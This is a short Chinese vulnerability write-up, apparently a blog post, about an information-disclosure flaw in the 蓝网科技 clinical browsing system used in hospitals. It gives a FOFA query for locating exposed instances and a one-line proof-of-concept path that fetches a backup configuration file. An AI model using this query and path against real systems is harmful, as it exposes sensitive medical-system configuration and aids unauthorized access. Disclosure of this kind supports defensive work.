【漏洞复现】蓝网科技临床浏览系统信息泄露漏洞

Nx01 产品简介

蓝网科技临床浏览系统是一个专门用于医疗行业的软件系统,主要用于医生、护士和其他医疗专业人员在临床工作中进行信息浏览、查询和管理。

Nx02 漏洞描述

蓝网科技临床浏览系统存在信息泄露漏洞,攻击者可以利用该漏洞获取敏感信息。

Nx03 产品主页

fofa-query: title=="临床浏览"

Nx04 漏洞复现

POC:

复制代码
/config/config%20bak.txt

Nx05 修复建议

建议联系软件厂商进行处理。

相关推荐
m***D28617 小时前
云原生网络
网络·云原生
u***276117 小时前
C#数据库操作系列---SqlSugar完结篇
网络·数据库·c#
wanhengidc18 小时前
深度了解云手机是什么
运维·服务器·科技·智能手机·云计算
JJ1M819 小时前
用 Python 快速搭建一个支持 HTTPS、CORS 和断点续传的文件服务器
服务器·python·https
白帽子黑客杰哥20 小时前
2025漏洞挖掘系统学习:从环境搭建到实战挖洞全流程
web安全·渗透测试·漏洞挖掘·网络安全就业
_Stellar20 小时前
Linux 服务器管理 根目录文件夹权限设置 基于用户组实现安全共享
linux·服务器·安全
立控信息LKONE20 小时前
库室采购安全设施设备——自主研发、国产化监管一体机
大数据·安全
LUCIFER20 小时前
驱动开发:详细分析 DTB、DTS、DTSI、DTBO 的区别、用途及它们之间的关系
linux·服务器·驱动开发
BullSmall1 天前
Test Matrix:测试矩阵(IT 领域定义 + 设计实践 + 华为场景应用)
运维·服务器
t***D2641 天前
HarmonyOS分布式安全
安全·华为·harmonyos